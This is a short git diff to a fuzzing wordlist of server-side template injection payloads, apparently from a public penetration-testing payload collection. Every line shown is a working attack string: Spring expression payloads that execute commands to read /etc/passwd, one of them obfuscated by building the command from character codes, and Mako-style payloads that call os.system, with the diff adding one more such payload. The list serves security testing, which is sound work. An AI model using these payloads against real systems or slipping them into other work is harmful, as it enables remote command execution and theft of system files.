diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz index 1918b46..d4f772c 100644 --- a/Server Side Template Injection/Intruder/ssti.fuzz +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -48,3 +48,4 @@ ${T(java.lang.System).getenv()} ${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')} ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}${self.module.cache.util.os.system("id")} ${self.module.runtime.util.os.system("id")} +${self.template.module.cache.util.os.system("id")}